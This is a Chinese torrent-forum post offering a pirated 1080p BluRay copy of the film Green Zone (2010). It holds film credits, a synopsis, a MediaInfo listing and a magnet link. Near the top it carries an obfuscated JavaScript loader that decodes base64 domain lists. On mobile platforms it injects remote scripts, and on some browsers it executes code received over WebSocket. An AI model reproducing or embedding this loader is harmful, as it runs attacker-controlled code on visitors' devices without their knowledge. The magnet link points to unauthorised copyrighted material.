绿区[中文字幕]Green.Zone.2010.1080p.BluRay.DTS.x265-10bit-迅雷下载 11.60GB

版主小s 2月前 324

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 绿区 / 关键指令 / 叛逆谍战 / 绿色地带

◎片 名 Green Zone

◎年 代 2010

◎产 地 美国 / 法国 / 西班牙 / 英国

◎类 别 剧情 / 动作 / 惊悚 / 战争

◎语 言 英语 / 阿拉伯语

◎上映日期 2010-03-12(美国)

◎IMDb评分 6.8/10 from 129305 users

◎IMDb链接 https://www.imdb.com/title/tt0947810

◎豆瓣评分 7.3/10 from 26920 users

◎豆瓣链接 https://movie.douban.com/subject/2131649/

◎片 长 115 分钟

◎导 演 保罗·格林格拉斯 Paul Greengrass

◎编 剧 布莱恩·海尔格兰德 Brian Helgeland

◎主 演 马特·达蒙 Matt Damon

格雷戈·金尼尔 Greg Kinnear

詹森·艾萨克 Jason Isaacs

布莱丹·格里森 Brendan Gleeson

艾米·莱安 Amy Ryan

毕扬·丹斯曼 Bijan Daneshmand

William Meredith

赫立德·阿卜杜拉 Khalid Abdalla

艾格尔·纳尔 Igal Naor

艾莉克丝摩尔 Alex Moore

Sean Huze

奥马尔·贝尔杜尼 Omar Berdouni

汤米·坎贝尔 Tommy Campbell

Troy Brown

Jerry Della Salla

Robert Harrison O'Neil

Brian VanRiper

◎标 签 战争 | 美国 | MattDamon | 伊拉克 | 动作 | 美国电影 | 2010 | 剧情

◎简 介

2003年,伊拉克战争爆发。萨达姆政府受到重创,大规模杀伤性武器(WMD)成为美国出兵伊拉克的有力借口。罗伊·米勒(马特·戴蒙 Matt Damon 饰)所率领的小分队奉命在伊拉克境内寻找WMD,然而无数次的搜寻皆无所获,这令米勒对线报的来源心生疑惑。某次行动中,他遇到当地的独腿男子法哈迪,从对方口中米勒得知一众伊拉克关键人物正在某地集会,行动中意外发现扑克牌通缉令上的艾尔·拉威(Yigal Naor 饰)也在其中,而艾尔·拉威似乎和美国政府有着错综复杂的关系。米勒不顾劝阻展开独立调查,发现所谓的WMD不过是包藏了无数丑恶真相的谎言而已……本片根据《华盛顿邮报》驻巴格达记者拉吉夫·产德拉斯卡兰(Rajiv Chandrasekaran)的作品《翡翠城的帝王生活:伊拉克绿色地带深处》改编。

◎获奖情况

第12届美国青少年选择奖(2010)

最佳动作冒险电影男演员(提名) 马特·达蒙

  1. General

  2. Unique ID : 189012754836827688191469697317927238858 (0x8E32884E0FF65F20356C40CE479DBCCA)

  3. Complete name : Green.Zone.2010.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.6 GiB

  7. Duration : 1 h 54 min

  8. Overall bit rate : 14.5 Mb/s

  9. Movie name : Green Zone 2010 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-07-07 08:11:03

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 54 min

  20. Bit rate : 12.9 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.260

  30. Stream size : 10.4 GiB (89%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 54 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.21 GiB (10%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 54 min

  61. Bit rate : 30.8 kb/s

  62. Count of elements : 2256

  63. Stream size : 25.1 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 54 min

  75. Bit rate : 31.5 kb/s

  76. Count of elements : 2256

  77. Stream size : 25.7 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:02:46.458 : en:Chapter 02

  85. 00:10:00.975 : en:Chapter 03

  86. 00:16:36.370 : en:Chapter 04

  87. 00:21:01.010 : en:Chapter 05

  88. 00:25:39.872 : en:Chapter 06

  89. 00:33:30.300 : en:Chapter 07

  90. 00:40:27.508 : en:Chapter 08

  91. 00:45:25.431 : en:Chapter 09

  92. 00:50:59.223 : en:Chapter 10

  93. 00:55:15.270 : en:Chapter 11

  94. 01:00:21.284 : en:Chapter 12

  95. 01:05:09.989 : en:Chapter 13

  96. 01:11:02.508 : en:Chapter 14

  97. 01:18:28.621 : en:Chapter 15

  98. 01:22:58.265 : en:Chapter 16

  99. 01:27:00.882 : en:Chapter 17

  100. 01:34:39.716 : en:Chapter 18

  101. 01:39:15.658 : en:Chapter 19

  102. 01:44:58.626 : en:Chapter 20


TAGS 动作 剧情 惊悚 战争

磁力链:
  • magnet:?xt=urn:btih:CCB269F160EF9C0FE6440EBEA5BFE283F1925E9E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回